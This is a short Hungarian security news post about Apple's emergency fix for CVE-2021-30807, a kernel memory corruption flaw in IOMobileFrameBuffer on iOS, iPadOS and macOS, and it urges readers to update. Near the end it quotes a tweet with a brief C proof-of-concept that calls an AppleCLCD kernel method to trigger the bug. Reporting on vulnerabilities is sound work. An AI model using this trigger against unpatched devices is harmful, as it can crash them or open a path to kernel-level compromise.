Kritikus hibajavítást adott ki az Apple iOS, iPadOS és macOS rendszerekre

Apple

⚠️ IMPORTANT ⚠️

Apple has issued an urgent #software update for #iOS, iPadOS and #macOS to patch a new zero-day #vulnerability (CVE-2021-30807) that it said may have been actively exploited.

Read details: https://t.co/0ntqlLUDVD #infosec #cybersecurity
— The Hacker News (@TheHackersNews) July 27, 2021

Soron kívüli frissítést adott ki az Apple az iOS, iPadOS és macOS rendszerekhez, ami olyan biztonsági hibát javít, amit potenciálisan aktívan kihasználnak. A frissítés, ami alig egy héttel a legutóbbi iOS, iPadOS és macOS Big Sur frissítés után érkezett egy memóriakorrupciós hibát (CVE-2021-30807) javít az IOMobileFrameBuffer komponensben, egy, a kijelző framebuffer kezelésért felelős kernel kiterjesztésben. A hiba sikeres kihasználása kernel privilégiumokkal történő kódfuttatást tehet lehetővé. Részletek itt.

Mivel - állítólag - PoC exploit is nyilvánosságra került, érdemes mielőbb frissíteni:

CVE-2021-30807 POC:

int main(){
io_service_t s = IOServiceGetMatchingService(0, IOServiceMatching("AppleCLCD"));
io_connect_t c;
IOServiceOpen(s,mach_task_self(),0,&c);
uint64_t a[1] = {0xFFFFFFFF};
uint64_t b[1] = {0};
uint32_t o = 1;
IOConnectCallScalarMethod(c,83,a,1,b,&o);
}
— binaryboy (@b1n4r1b01) July 26, 2021

Részletek magyarul itt.

A hozzászóláshoz be kell jelentkezni